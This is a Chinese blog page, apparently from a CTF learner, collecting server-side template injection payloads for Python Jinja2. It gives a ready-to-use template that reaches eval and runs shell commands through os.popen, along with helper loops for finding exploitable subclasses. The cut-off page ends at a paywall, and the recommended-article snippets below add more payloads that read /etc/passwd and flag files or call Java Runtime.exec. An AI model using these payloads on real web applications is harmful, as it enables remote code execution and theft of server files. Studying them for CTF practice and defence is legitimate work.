《附件》--- SSTI的无脑找的，没有知识含量的payload

最新推荐文章于 2025-05-18 15:30:12 发布

原创

最新推荐文章于 2025-05-18 15:30:12 发布 · 369 阅读

0 ·

CC 4.0 BY-SA版权

在这里插入图片描述

我把能搜过来的payload都搜过来，，，，
碰到题再说吧，，，这payload太多了啊。。。

这个模板可以用来现找payload

自己再改一改就好了

{
   
   % for c in [].__class__.__base__.__subclasses__() %}
{
   
   % if c.__name__ == 'catch_warnings' %}
  {
   
   % for b in c.__init__.__globals__.values() %}
  {
   
   % if b.__class__ == {
   
   }.__class__ %}
    {
   
   % if 'eval' in b.keys() %}
      {
   
   {
   
    b['eval']('__import__("os").popen("ls").read()') }}         //poppen的参数就是要执行的命令
    {
   
   % endif %}
  {
   
   % endif %}
  {
   
   % endfor %}
{
   
   % endif %}
{
   
   % endfor %}

如果环境中和本地的一样的话

那么可以这样找py2中

for i in enumerate(''.__class__.__mro__[-1].__subclasses__()): print i

在这里插入图片描述
比如我们想要一个执行命令的payload，如何查找？很简单我们只需要有os模块执行os.system即可

num = 0
for item in ''.__class__.__mro__[-1].__subclasses__():
    try:
        if 'os' in item.__init__.__globals__:
            print num,item
        num+=1
    except:
        num+=1
#72 <class 'site._Printer'>
#77 <class 'site.Quitter'>

py3中

for i in enumerate(().__class__.__base__.__subclasses__()

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Zero_Adam

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

SSTI的payload构造思路

shawdow_bug的博客

04-24

2415

内置的方法和属性有些对象类型内置了一些可读属性，它们不会被dir()列举出来。属性/方法描述 instance._class_ 类实例所属的类 class._bases_ 类对象（类也是对象）的基类元组 definition._name_ 类、函数、方法、描述符或生成器实例的名称。 class._mro_ 此属性是在方法解析期间查找基类时考虑的类元组。 class._subclasses_() 每个类都保留一个对其直接子类的弱引用列表。此方法返回所有仍然存活的引用的列表

SSTI-payload和各种绕过方法

qq_44418229的博客

07-25

2265

SSTI总结：流程和绕过

参与评论您还未登录，请先登录后发表或查看评论

ssti-payload：SSTI有效载荷生成器

02-06

SSTI有效载荷发生器该生成器是针对特定类型的Java SSTI的，其受以下启发： ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).conc

SSTI的常用payload

weixin_45649612的博客

10-11

691

命令执行 exp：目录读取 {{config.class.init.globals[‘os’].popen(‘ls …/’).read()}} 文件读取 exp：读取该目录app/flag的文件 {{config.class.init.globals[‘os’].popen(‘cat /app/flag’).read() }}

SSTI详解一文了解SSTI和所有常见payload 以flask模板为例

闵行小鱼塘

10-13

6688

做的ctf题里有好几道跟SSTI有关，故对SSTI进行学习，在此做个小结与记录

探索 SSTI 攻击payload库：Payloadbox 的 SSTI Payloads

gitblog_00036的博客

04-17

515

探索 SSTI 攻击payload库：Payloadbox 的 SSTI Payloads 在这个数字化的时代，安全是任何在线服务的基石。软件供应链中的漏洞（如 Server-Side Template Injection, 简称SSTI）是一种常见且危险的安全威胁。为了帮助开发者更好地识别和防御这类攻击，创建了一个全面的库，供广大社区使用。项目简介是一个开源项目，专注于收集、分类和更新...

基于SSTI模块注入的常用payload总结

Welcome To My6n Blog

07-05

2572

一、查找函数位置，利用函数实现 1、利用file函数进行读取 2、利用内嵌函数eval进行命令执行 3、利用linecache函数进行命令执行二、查找类的位置，利用类下的函数实现 1、利用_frozen_importlib_external.FileLoader类 2、利用importlib类进行命令执行 3、利用subprocess.Popen类进行命令执行三、利用os模块进行命令执行 1、利用config 2、利用url_for 3、利用子类的os模块四、关于其他的利用

ctf ssti 各种payload与绕过（后续会补充绕过）

m0_59855041的博客

06-07

1059

_class__ 返回一个实例所属的类__mro__ 查看类继承的所有父类，直到object__subclasses__() 获取一个类的子类，返回的是一个列表__bases__ 返回一个类直接所继承的类（元组形式）__init__ 类实例创建之后调用, 对当前对象的实例的一些初始化__globals__ 使用方式是函数名.__globals__，返回一个当前空间下能使用的模块，方法和变量的字典，与func_globals等价。

SSTI~

最新发布

2301_79202429的博客

05-18

555

ssti注入中payload构造整体可以分为两部分：类->函数（一般用popen执行系统命令）；?直接函数（popen执行系统命令）

ssti（2）

2302_79119987的博客

05-21

1420

尝试{%%}，想回显内容在外面加个print就行，

Blind_SPOT:盲点是一个python工具，用于盲注漏洞，基于SQLi时间，命令注入，代码注入，SSTI

05-30

盲点盲点是一个python工具，用于盲注漏洞，基于SQLi时间，命令注入，代码注入，SSTI 要求：- Python3 请求和 colorama 库用法：- -u ===>目标网址在您的注入区域或参数中添加 [*] -p payload_list ，有 r zahir009 与工具 <3 python3 -u -p 有效载荷列表保持 H4cking .. ^^

SSTI模板注入

Welcome To My6n Blog

07-04

1419

1、原理简述 2、常用payload及相关脚本函数调用、高危函数 3、实战：攻防世界 Web_python_template_injection

ssti总结

m0_52432374的博客

09-18

2984

小学的时候拿别人的好词好句，套在我们自己的作文里，此时我们的作文就相当于模板，而别人的好词好句就相当于传递进模板的内容。那么什么是模板注入呢，当不正确的使用模板引擎进行渲染时，则会造成模板注入通俗点理解：拿到数据，塞到模板里，然后让渲染引擎将赛进去的东西生成 html 的文本，返回给浏览器，这样做的好处展示数据快，大大提升效率。

SSTI靶场

qq_63928796的博客

06-21

1802

SSTI，又称服务端模板注入攻击。jinja2模板中使用{}语法表示一个变量，它是一种特殊的占位符。当利用jinja2进行渲染的时候，它会把这些特殊的占位符进行填充/替换。但是在进行目标编译渲染的过程中，执行了用户插入的恶意内容，因而可能导致了敏感信息泄露、代码执行、GetShell等问题首先看一下__class__用python试一下输出了说明''是str类另外还有其他类型str(字符串)、dict(字典)、tuple(元组)、list(列表)，这些类型的基类都是object，...

ssti小总结

cuddlylm的博客

04-09

3256

漏洞简介 SSTI即服务端模版注入攻击。由于程序员代码编写不当，导致用户输入可以修改服务端模版的执行逻辑，从而造成XSS,任意文件读取，代码执行等一系列问题. 1. 几种常用于ssti的魔术方法 __class__ 返回类型所属的对象 __mro__ 返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。 __base__ 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的 __subclasses__ 每个新类都保留了子类的引用，这个方法返回一个类

SSTI漏洞详解

apple_74953689的博客

07-26

3865

SSTI（Server-Side Template Injection）是一种发生在服务器端模板中的漏洞。当应用程序接受用户输入并将其直接传递到模板引擎中进行解析时，如果未对用户输入进行，攻击者可以通过构造来注入模板代码，导致服务器端模板引擎执行恶意代码。more常见的模板有很多，不同模板的语法也不相同，在实际情况我们可以测试判断属于哪一种模板。下面将引用一个简单的例子来说明，假设有一个包含以下代码的Twig模板文件Hello, 49!但是，如果攻击者将。

SSTI(模板注入)漏洞利用

Ciyaso的博客

07-15

768

读写文件读文件：方法一 ''.__class__.__mro__[2].__subclasses__()[166].__init__.__globals__['__builtins__']['file']('/etc/passwd').read() 方法二： [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() 写文件换为 .write() 即可。写文件：方法一： ''.__class__.__mro__[2].__su

SSTI漏洞原理及渗透测试

二狗的博客

02-14

812

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供：当然除了有配套的视频，同时也为大家整理了各种文档和书籍资料&工具，并且已经帮大家分好类了。

实验室任务十

doubirui的博客

03-16

2571

SSTI(Server-Side Template Injection)从名字可以看出即是服务器端模板注入。比如python的flask、php的thinkphp、java的spring等框架一般都采用MVC的模式，用户的输入先进入Controller控制器，然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断，数据库存取，最后把结果返回给View视图层，经过模板渲染展示给用户。SSTI和SQL注入原理差不多，都是因为对输入的字符串控制不足，把输入的字符串当成命令执行。

Java SSTI漏洞利用工具：ssti-payload生成器

- **ssti-payload-master**: 表示该压缩包的名称为`ssti-payload`，并且是主版本（master），表明这是源代码的主体版本，不一定是最新版本，但通常是稳定的版本。 #### 详细知识点服务器端模板注入（SSTI）是一种...